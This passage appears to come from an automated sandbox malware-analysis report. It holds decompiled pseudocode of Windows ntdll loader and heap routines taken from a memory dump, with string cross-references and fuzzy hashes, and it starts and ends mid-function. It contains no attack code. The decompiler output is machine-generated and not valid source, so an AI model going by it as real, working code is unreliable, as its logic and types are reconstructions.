                                                                                                            						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                                                            						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                                                            						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                                                            							L6:
                                                                                                            							if(E0107934A() != 0) {
                                                                                                            								_t159 = E010EA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                                                            								__eflags = _t159;
                                                                                                            								if(_t159 < 0) {
                                                                                                            									_t81 =  *0x1155780; // 0x0
                                                                                                            									__eflags = _t81 & 0x00000003;
                                                                                                            									if((_t81 & 0x00000003) != 0) {
                                                                                                            										_push(_t159);
                                                                                                            										E010E5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                                                            										_t81 =  *0x1155780; // 0x0
                                                                                                            									}
                                                                                                            									__eflags = _t81 & 0x00000010;
                                                                                                            									if((_t81 & 0x00000010) != 0) {
                                                                                                            										asm("int3");
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t159 = E0107849B(0, _t122, _t153, _t159, _t180);
                                                                                                            							if(_t159 >= 0) {
                                                                                                            								goto L6;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t80 = _t159;
                                                                                                            						goto L8;
                                                                                                            					} else {
                                                                                                            						_t125 = 0x13;
                                                                                                            						asm("int 0x29");
                                                                                                            						_push(0);
                                                                                                            						_push(_t159);
                                                                                                            						_t161 = _t125;
                                                                                                            						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                                                            						_t143 = 0;
                                                                                                            						_v40 = _t161;
                                                                                                            						_t118 = 0;
                                                                                                            						_push(_t153);
                                                                                                            						__eflags = _t87;
                                                                                                            						if(_t87 != 0) {
                                                                                                            							_t118 = _t87 + 0x5d8;
                                                                                                            							__eflags = _t118;
                                                                                                            							if(_t118 == 0) {
                                                                                                            								L46:
                                                                                                            								_t118 = 0;
                                                                                                            							} else {
                                                                                                            								__eflags =  *(_t118 + 0x30);
                                                                                                            								if( *(_t118 + 0x30) == 0) {
                                                                                                            									goto L46;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_v32 = 0;
                                                                                                            						_v28 = 0;
                                                                                                            						_v16 = 0;
                                                                                                            						_v20 = 0;
                                                                                                            						_v12 = 0;
                                                                                                            						__eflags = _t118;
                                                                                                            						if(_t118 != 0) {
                                                                                                            							__eflags = _t161;
                                                                                                            							if(_t161 != 0) {
                                                                                                            								__eflags =  *(_t118 + 8);
                                                                                                            								if( *(_t118 + 8) == 0) {
                                                                                                            									L22:
                                                                                                            									_t143 = 1;
                                                                                                            									__eflags = 1;
                                                                                                            								} else {
                                                                                                            									_t19 = _t118 + 0x40; // 0x40
                                                                                                            									_t156 = _t19;
                                                                                                            									E01078999(_t19,  &_v16);
                                                                                                            									__eflags = _v0;
                                                                                                            									if(_v0 != 0) {
                                                                                                            										__eflags = _v0 - 1;
                                                                                                            										if(_v0 != 1) {
                                                                                                            											goto L22;
                                                                                                            										} else {
                                                                                                            											_t128 =  *(_t161 + 0x64);
                                                                                                            											__eflags =  *(_t161 + 0x64);
                                                                                                            											if( *(_t161 + 0x64) == 0) {
                                                                                                            												goto L22;
                                                                                                            											} else {
                                                                                                            												E01078999(_t128,  &_v12);
                                                                                                            												_t147 = _v12;
                                                                                                            												_t91 = 0;
                                                                                                            												__eflags = 0;
                                                                                                            												_t129 =  *_t147;
                                                                                                            												while(1) {
                                                                                                            													__eflags =  *((intOrPtr*)(0x1155c60 + _t91 * 8)) - _t129;
                                                                                                            													if( *((intOrPtr*)(0x1155c60 + _t91 * 8)) == _t129) {
                                                                                                            														break;
                                                                                                            													}
                                                                                                            													_t91 = _t91 + 1;
                                                                                                            													__eflags = _t91 - 5;
                                                                                                            													if(_t91 < 5) {
                                                                                                            														continue;
                                                                                                            													} else {
                                                                                                            														_t131 = 0;
                                                                                                            														__eflags = 0;
                                                                                                            													}
                                                                                                            													L37:
                                                                                                            													__eflags = _t131;
                                                                                                            													if(_t131 != 0) {
                                                                                                            														goto L22;
                                                                                                            													} else {
                                                                                                            														__eflags = _v16 - _t147;
                                                                                                            														if(_v16 != _t147) {
                                                                                                            															goto L22;
                                                                                                            														} else {
                                                                                                            															E01082280(_t92, 0x11586cc);
                                                                                                            															_t94 = E01139DFB( &_v20);
                                                                                                            															__eflags = _t94 - 1;
                                                                                                            															if(_t94 != 1) {
                                                                                                            															}
                                                                                                            															asm("movsd");
                                                                                                            															asm("movsd");
                                                                                                            															asm("movsd");
                                                                                                            															asm("movsd");
                                                                                                            															 *_t118 =  *_t118 + 1;
                                                                                                            															asm("adc dword [ebx+0x4], 0x0");
                                                                                                            															_t95 = E010961A0( &_v32);
                                                                                                            															__eflags = _t95;
                                                                                                            															if(_t95 != 0) {
                                                                                                            																__eflags = _v32 | _v28;
                                                                                                            																if((_v32 | _v28) != 0) {
                                                                                                            																	_t71 = _t118 + 0x40; // 0x3f
                                                                                                            																	_t134 = _t71;
                                                                                                            																	goto L55;
                                                                                                            																}
                                                                                                            															}
                                                                                                            															goto L30;
                                                                                                            														}
                                                                                                            													}
                                                                                                            													goto L56;
                                                                                                            												}
                                                                                                            												_t92 = 0x1155c64 + _t91 * 8;
                                                                                                            												asm("lock xadd [eax], ecx");
                                                                                                            												_t131 = (_t129 | 0xffffffff) - 1;
                                                                                                            												goto L37;
                                                                                                            											}
                                                                                                            										}
                                                                                                            										goto L56;
                                                                                                            									} else {
                                                                                                            										_t143 = E01078A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                                                            										__eflags = _t143;
                                                                                                            										if(_t143 != 0) {
                                                                                                            											_t157 = _v12;
                                                                                                            											_t103 = 0;
                                                                                                            											__eflags = 0;
                                                                                                            											_t136 =  &(_t157[1]);
                                                                                                            											 *(_t161 + 0x64) = _t136;
                                                                                                            											_t151 =  *_t157;
                                                                                                            											_v20 = _t136;
                                                                                                            											while(1) {
                                                                                                            												__eflags =  *((intOrPtr*)(0x1155c60 + _t103 * 8)) - _t151;
                                                                                                            												if( *((intOrPtr*)(0x1155c60 + _t103 * 8)) == _t151) {
                                                                                                            													break;
                                                                                                            												}
                                                                                                            												_t103 = _t103 + 1;
                                                                                                            												__eflags = _t103 - 5;
                                                                                                            												if(_t103 < 5) {
                                                                                                            													continue;
                                                                                                            												}
                                                                                                            												L21:
                                                                                                            												_t105 = E010AF380(_t136, 0x1041184, 0x10);
                                                                                                            												__eflags = _t105;
                                                                                                            												if(_t105 != 0) {
                                                                                                            													__eflags =  *_t157 -  *_v16;
                                                                                                            													if( *_t157 >=  *_v16) {
                                                                                                            														goto L22;
                                                                                                            													} else {
                                                                                                            														asm("cdq");
                                                                                                            														_t166 = _t157[5] & 0x0000ffff;
                                                                                                            														_t108 = _t157[5] & 0x0000ffff;
                                                                                                            														asm("cdq");
                                                                                                            														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                                                            														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                                                            														if(__eflags > 0) {
                                                                                                            															L29:
                                                                                                            															E01082280(_t108, 0x11586cc);
                                                                                                            															 *_t118 =  *_t118 + 1;
                                                                                                            															_t42 = _t118 + 0x40; // 0x3f
                                                                                                            															_t156 = _t42;
                                                                                                            															asm("adc dword [ebx+0x4], 0x0");
                                                                                                            															asm("movsd");
                                                                                                            															asm("movsd");
                                                                                                            															asm("movsd");
                                                                                                            															asm("movsd");
                                                                                                            															_t110 = E010961A0( &_v32);
                                                                                                            															__eflags = _t110;
                                                                                                            															if(_t110 != 0) {
                                                                                                            																__eflags = _v32 | _v28;
                                                                                                            																if((_v32 | _v28) != 0) {
                                                                                                            																	_t134 = _v20;
                                                                                                            																	L55:
                                                                                                            																	E01139D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                                                            																}
                                                                                                            															}
                                                                                                            															L30:
                                                                                                            															 *_t118 =  *_t118 + 1;
                                                                                                            															asm("adc dword [ebx+0x4], 0x0");
                                                                                                            															E0107FFB0(_t118, _t156, 0x11586cc);
                                                                                                            															goto L22;
                                                                                                            														} else {
                                                                                                            															if(__eflags < 0) {
                                                                                                            																goto L22;
                                                                                                            															} else {
                                                                                                            																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                                                            																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                                                            																	goto L22;
                                                                                                            																} else {
                                                                                                            																	goto L29;
                                                                                                            																}
                                                                                                            															}
                                                                                                            														}
                                                                                                            													}
                                                                                                            													goto L56;
                                                                                                            												}
                                                                                                            												goto L22;
                                                                                                            											}
                                                                                                            											asm("lock inc dword [eax]");
                                                                                                            											goto L21;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						return _t143;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_push( &_v8);
                                                                                                            					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                                                            					_push(__ecx + 0x40);
                                                                                                            					_push(_t121);
                                                                                                            					_push(0xffffffff);
                                                                                                            					_t80 = E010A9A00();
                                                                                                            					_t159 = _t80;
                                                                                                            					if(_t159 < 0) {
                                                                                                            						L8:
                                                                                                            						return _t80;
                                                                                                            					} else {
                                                                                                            						goto L2;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L56:
                                                                                                            			}












































                                                                                                            0x0107890f
                                                                                                            0x01078916
                                                                                                            0x01078917
                                                                                                            0x01078918
                                                                                                            0x01078919
                                                                                                            0x0107891a
                                                                                                            0x0107891f
                                                                                                            0x01078921
                                                                                                            0x010c9c52
                                                                                                            0x010c9c55
                                                                                                            0x010c9c5b
                                                                                                            0x010c9cac
                                                                                                            0x010c9cc0
                                                                                                            0x010c9cc0
                                                                                                            0x010c9c55
                                                                                                            0x01078927
                                                                                                            0x01078927
                                                                                                            0x0107892f
                                                                                                            0x01078933
                                                                                                            0x00000000
                                                                                                            0x010788f5
                                                                                                            0x010788f5
                                                                                                            0x00000000
                                                                                                            0x010788f7
                                                                                                            0x010788f7
                                                                                                            0x010788fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010788fa
                                                                                                            0x010788f5
                                                                                                            0x010788f3
                                                                                                            0x00000000
                                                                                                            0x010788d5
                                                                                                            0x00000000
                                                                                                            0x010788b2
                                                                                                            0x010788c9
                                                                                                            0x00000000
                                                                                                            0x010788c9
                                                                                                            0x0107887f
                                                                                                            0x0107886a
                                                                                                            0x01078857
                                                                                                            0x01078852
                                                                                                            0x010788bf
                                                                                                            0x010788bf
                                                                                                            0x010787aa
                                                                                                            0x010787ad
                                                                                                            0x010787ae
                                                                                                            0x010787b4
                                                                                                            0x010787b5
                                                                                                            0x010787b6
                                                                                                            0x010787b8
                                                                                                            0x010787bd
                                                                                                            0x010787c1
                                                                                                            0x010787f4
                                                                                                            0x010787fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010787c1
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 010C9C18
                                                                                                            • LdrpDoPostSnapWork, xrefs: 010C9C1E
                                                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 010C9C28
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                            • API String ID: 2994545307-1948996284
                                                                                                            • Opcode ID: 36cb8a50f83cfa0ca9a605d126cb89a1348e66cb0daa733a1372191ec401531b
                                                                                                            • Instruction ID: 0a268af490416f1e63ae5cec32c268bdb93b39e00702c1424133ce81c6ff0ff2
                                                                                                            • Opcode Fuzzy Hash: 36cb8a50f83cfa0ca9a605d126cb89a1348e66cb0daa733a1372191ec401531b
                                                                                                            • Instruction Fuzzy Hash: E491F471E0020ADFDB98DF59D4C4ABEBBF5FF44314B4881AAD985AB141D730E941CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E0109AC7B(void* __ecx, signed short* __edx) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				void* __ebx;
                                                                                                            				signed char _t75;
                                                                                                            				signed int _t79;
                                                                                                            				signed int _t88;
                                                                                                            				intOrPtr _t89;
                                                                                                            				signed int _t96;
                                                                                                            				signed char* _t97;
                                                                                                            				intOrPtr _t98;
                                                                                                            				signed int _t101;
                                                                                                            				signed char* _t102;
                                                                                                            				intOrPtr _t103;
                                                                                                            				signed int _t105;
                                                                                                            				signed char* _t106;
                                                                                                            				signed int _t131;
                                                                                                            				signed int _t138;
                                                                                                            				void* _t149;
                                                                                                            				signed short* _t150;
                                                                                                            
                                                                                                            				_t150 = __edx;
                                                                                                            				_t149 = __ecx;
                                                                                                            				_t70 =  *__edx & 0x0000ffff;
                                                                                                            				__edx[1] = __edx[1] & 0x000000f8;
                                                                                                            				__edx[3] = 0;
                                                                                                            				_v8 =  *__edx & 0x0000ffff;
                                                                                                            				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
                                                                                                            					_t39 =  &(_t150[8]); // 0x8
                                                                                                            					E010BD5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
                                                                                                            					__edx[1] = __edx[1] | 0x00000004;
                                                                                                            				}
                                                                                                            				_t75 =  *(_t149 + 0xcc) ^  *0x1158a68;
                                                                                                            				if(_t75 != 0) {
                                                                                                            					L4:
                                                                                                            					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                                                                                                            						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
                                                                                                            						_t79 =  *(_t149 + 0x50);
                                                                                                            						 *_t150 =  *_t150 ^ _t79;
                                                                                                            						return _t79;
                                                                                                            					}
                                                                                                            					return _t75;
                                                                                                            				} else {
                                                                                                            					_t9 =  &(_t150[0x80f]); // 0x1017
                                                                                                            					_t138 = _t9 & 0xfffff000;
                                                                                                            					_t10 =  &(_t150[0x14]); // 0x20
                                                                                                            					_v12 = _t138;
                                                                                                            					if(_t138 == _t10) {
                                                                                                            						_t138 = _t138 + 0x1000;
                                                                                                            						_v12 = _t138;
                                                                                                            					}
                                                                                                            					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
                                                                                                            					if(_t75 > _t138) {
                                                                                                            						_v8 = _t75 - _t138;
                                                                                                            						_push(0x4000);
                                                                                                            						_push( &_v8);
                                                                                                            						_push( &_v12);
                                                                                                            						_push(0xffffffff);
                                                                                                            						_t131 = E010A96E0();
                                                                                                            						__eflags = _t131 - 0xc0000045;
                                                                                                            						if(_t131 == 0xc0000045) {
                                                                                                            							_t88 = E01113C60(_v12, _v8);
                                                                                                            							__eflags = _t88;
                                                                                                            							if(_t88 != 0) {
                                                                                                            								_push(0x4000);
                                                                                                            								_push( &_v8);
                                                                                                            								_push( &_v12);
                                                                                                            								_push(0xffffffff);
                                                                                                            								_t131 = E010A96E0();
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t89 =  *[fs:0x30];
                                                                                                            						__eflags = _t131;
                                                                                                            						if(_t131 < 0) {
                                                                                                            							__eflags =  *(_t89 + 0xc);
                                                                                                            							if( *(_t89 + 0xc) == 0) {
                                                                                                            								_push("HEAP: ");
                                                                                                            								E0106B150();
                                                                                                            							} else {
                                                                                                            								E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            							}
                                                                                                            							_push(_v8);
                                                                                                            							_push(_v12);
                                                                                                            							_push(_t149);
                                                                                                            							_t75 = E0106B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
                                                                                                            							goto L4;
                                                                                                            						} else {
                                                                                                            							_t96 =  *(_t89 + 0x50);
                                                                                                            							_t132 = 0x7ffe0380;
                                                                                                            							__eflags = _t96;
                                                                                                            							if(_t96 != 0) {
                                                                                                            								__eflags =  *_t96;
                                                                                                            								if( *_t96 == 0) {
                                                                                                            									goto L10;
                                                                                                            								}
                                                                                                            								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                                                            								L11:
                                                                                                            								__eflags =  *_t97;
                                                                                                            								if( *_t97 != 0) {
                                                                                                            									_t98 =  *[fs:0x30];
                                                                                                            									__eflags =  *(_t98 + 0x240) & 0x00000001;
                                                                                                            									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
                                                                                                            										E011214FB(_t132, _t149, _v12, _v8, 7);
                                                                                                            									}
                                                                                                            								}
                                                                                                            								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
                                                                                                            								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
                                                                                                            								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
                                                                                                            								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
                                                                                                            								_t101 =  *( *[fs:0x30] + 0x50);
                                                                                                            								__eflags = _t101;
                                                                                                            								if(_t101 != 0) {
                                                                                                            									__eflags =  *_t101;
                                                                                                            									if( *_t101 == 0) {
                                                                                                            										goto L13;
                                                                                                            									}
                                                                                                            									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                                                            									goto L14;
                                                                                                            								} else {
                                                                                                            									L13:
                                                                                                            									_t102 = _t132;
                                                                                                            									L14:
                                                                                                            									__eflags =  *_t102;
                                                                                                            									if( *_t102 != 0) {
                                                                                                            										_t103 =  *[fs:0x30];
                                                                                                            										__eflags =  *(_t103 + 0x240) & 0x00000001;
                                                                                                            										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
                                                                                                            											__eflags = E01087D50();
                                                                                                            											if(__eflags != 0) {
                                                                                                            												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                                                            												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                                                            											}
                                                                                                            											E01121411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
                                                                                                            										}
                                                                                                            									}
                                                                                                            									_t133 = 0x7ffe038a;
                                                                                                            									_t105 =  *( *[fs:0x30] + 0x50);
                                                                                                            									__eflags = _t105;
                                                                                                            									if(_t105 != 0) {
                                                                                                            										__eflags =  *_t105;
                                                                                                            										if( *_t105 == 0) {
                                                                                                            											goto L16;
                                                                                                            										}
                                                                                                            										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
                                                                                                            										goto L17;
                                                                                                            									} else {
                                                                                                            										L16:
                                                                                                            										_t106 = _t133;
                                                                                                            										L17:
                                                                                                            										__eflags =  *_t106;
                                                                                                            										if( *_t106 != 0) {
                                                                                                            											__eflags = E01087D50();
                                                                                                            											if(__eflags != 0) {
                                                                                                            												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
                                                                                                            												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
                                                                                                            											}
                                                                                                            											E01121411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
                                                                                                            										}
                                                                                                            										_t75 = _t150[1] & 0x00000013 | 0x00000008;
                                                                                                            										_t150[1] = _t75;
                                                                                                            										goto L4;
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L10:
                                                                                                            							_t97 = _t132;
                                                                                                            							goto L11;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						goto L4;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}























                                                                                                            Strings
                                                                                                            • HEAP: , xrefs: 010DA0BA
                                                                                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 010DA0CD
                                                                                                            • HEAP[%wZ]: , xrefs: 010DA0AD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                            • API String ID: 0-1340214556
                                                                                                            • Opcode ID: 807ef5167f5a68d0471619a869d52aba3ee86900ef2e0f5184bb914f2ebe684e
                                                                                                            • Instruction ID: 2d178d28d07bdda20a37f61bc276fe57d71e8c58c97678d33ac3546cd07e41af
                                                                                                            • Opcode Fuzzy Hash: 807ef5167f5a68d0471619a869d52aba3ee86900ef2e0f5184bb914f2ebe684e
                                                                                                            • Instruction Fuzzy Hash: 1781E471305684EFEB26DBA8C894BAABBF8FF04714F0441E5E5D28B692D774E940DB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 74%
                                                                                                            			E0108B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
                                                                                                            				signed int _v8;
                                                                                                            				char _v12;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t72;
                                                                                                            				char _t76;
                                                                                                            				signed char _t77;
                                                                                                            				intOrPtr* _t80;
                                                                                                            				unsigned int _t85;
                                                                                                            				signed int* _t86;
                                                                                                            				signed int _t88;
                                                                                                            				signed char _t89;
                                                                                                            				intOrPtr _t90;
                                                                                                            				intOrPtr _t101;
                                                                                                            				intOrPtr* _t111;
                                                                                                            				void* _t117;
                                                                                                            				intOrPtr* _t118;
                                                                                                            				signed int _t120;
                                                                                                            				signed char _t121;
                                                                                                            				intOrPtr* _t123;
                                                                                                            				signed int _t126;
                                                                                                            				intOrPtr _t136;
                                                                                                            				signed int _t139;
                                                                                                            				void* _t140;
                                                                                                            				signed int _t141;
                                                                                                            				void* _t147;
                                                                                                            
                                                                                                            				_t111 = _a4;
                                                                                                            				_t140 = __ecx;
                                                                                                            				_v8 = __edx;
                                                                                                            				_t3 = _t111 + 0x18; // 0x0
                                                                                                            				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
                                                                                                            				_t5 = _t111 - 8; // -32
                                                                                                            				_t141 = _t5;
                                                                                                            				 *(_t111 + 0x14) = _a8;
                                                                                                            				_t72 = 4;
                                                                                                            				 *(_t141 + 2) = 1;
                                                                                                            				 *_t141 = _t72;
                                                                                                            				 *((char*)(_t141 + 7)) = 3;
                                                                                                            				_t134 =  *((intOrPtr*)(__edx + 0x18));
                                                                                                            				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
                                                                                                            					_t76 = (_t141 - __edx >> 0x10) + 1;
                                                                                                            					_v12 = _t76;
                                                                                                            					__eflags = _t76 - 0xfe;
                                                                                                            					if(_t76 >= 0xfe) {
                                                                                                            						_push(__edx);
                                                                                                            						_push(0);
                                                                                                            						E0112A80D(_t134, 3, _t141, __edx);
                                                                                                            						_t76 = _v12;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t76 = 0;
                                                                                                            				}
                                                                                                            				 *((char*)(_t141 + 6)) = _t76;
                                                                                                            				if( *0x1158748 >= 1) {
                                                                                                            					__eflags = _a12 - _t141;
                                                                                                            					if(_a12 <= _t141) {
                                                                                                            						goto L4;
                                                                                                            					}
                                                                                                            					_t101 =  *[fs:0x30];
                                                                                                            					__eflags =  *(_t101 + 0xc);
                                                                                                            					if( *(_t101 + 0xc) == 0) {
                                                                                                            						_push("HEAP: ");
                                                                                                            						E0106B150();
                                                                                                            					} else {
                                                                                                            						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            					}
                                                                                                            					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
                                                                                                            					E0106B150();
                                                                                                            					__eflags =  *0x1157bc8;
                                                                                                            					if(__eflags == 0) {
                                                                                                            						E01122073(_t111, 1, _t140, __eflags);
                                                                                                            					}
                                                                                                            					goto L3;
                                                                                                            				} else {
                                                                                                            					L3:
                                                                                                            					_t147 = _a12 - _t141;
                                                                                                            					L4:
                                                                                                            					if(_t147 != 0) {
                                                                                                            						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
                                                                                                            					}
                                                                                                            					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
                                                                                                            						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
                                                                                                            						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
                                                                                                            					}
                                                                                                            					_t135 =  *(_t111 + 0x14);
                                                                                                            					if( *(_t111 + 0x14) == 0) {
                                                                                                            						L12:
                                                                                                            						_t77 =  *((intOrPtr*)(_t141 + 6));
                                                                                                            						if(_t77 != 0) {
                                                                                                            							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
                                                                                                            						} else {
                                                                                                            							_t117 = _t140;
                                                                                                            						}
                                                                                                            						_t118 = _t117 + 0x38;
                                                                                                            						_t26 = _t111 + 8; // -16
                                                                                                            						_t80 = _t26;
                                                                                                            						_t136 =  *_t118;
                                                                                                            						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
                                                                                                            							_push(_t118);
                                                                                                            							_push(0);
                                                                                                            							E0112A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
                                                                                                            						} else {
                                                                                                            							 *_t80 = _t136;
                                                                                                            							 *((intOrPtr*)(_t80 + 4)) = _t118;
                                                                                                            							 *((intOrPtr*)(_t136 + 4)) = _t80;
                                                                                                            							 *_t118 = _t80;
                                                                                                            						}
                                                                                                            						_t120 = _v8;
                                                                                                            						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
                                                                                                            						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
                                                                                                            						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
                                                                                                            						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
                                                                                                            						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
                                                                                                            							__eflags =  *(_t140 + 0xb8);
                                                                                                            							if( *(_t140 + 0xb8) == 0) {
                                                                                                            								_t88 =  *(_t140 + 0x40) & 0x00000003;
                                                                                                            								__eflags = _t88 - 2;
                                                                                                            								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
                                                                                                            								__eflags =  *0x1158720 & 0x00000001;
                                                                                                            								_t89 = _t88 & 0xffffff00 | ( *0x1158720 & 0x00000001) == 0x00000000;
                                                                                                            								__eflags = _t89 & _t121;
                                                                                                            								if((_t89 & _t121) != 0) {
                                                                                                            									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t85 =  *(_t111 + 0x14);
                                                                                                            						if(_t85 >= 0x7f000) {
                                                                                                            							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
                                                                                                            						}
                                                                                                            						_t86 = _a16;
                                                                                                            						 *_t86 = _t141 - _a12 >> 3;
                                                                                                            						return _t86;
                                                                                                            					} else {
                                                                                                            						_t90 = E0108B8E4(_t135);
                                                                                                            						_t123 =  *((intOrPtr*)(_t90 + 4));
                                                                                                            						if( *_t123 != _t90) {
                                                                                                            							_push(_t123);
                                                                                                            							_push( *_t123);
                                                                                                            							E0112A80D(0, 0xd, _t90, 0);
                                                                                                            						} else {
                                                                                                            							 *_t111 = _t90;
                                                                                                            							 *((intOrPtr*)(_t111 + 4)) = _t123;
                                                                                                            							 *_t123 = _t111;
                                                                                                            							 *((intOrPtr*)(_t90 + 4)) = _t111;
                                                                                                            						}
                                                                                                            						_t139 =  *(_t140 + 0xb8);
                                                                                                            						if(_t139 != 0) {
                                                                                                            							_t93 =  *(_t111 + 0x14) >> 0xc;
                                                                                                            							__eflags = _t93;
                                                                                                            							while(1) {
                                                                                                            								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
                                                                                                            								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								_t126 =  *_t139;
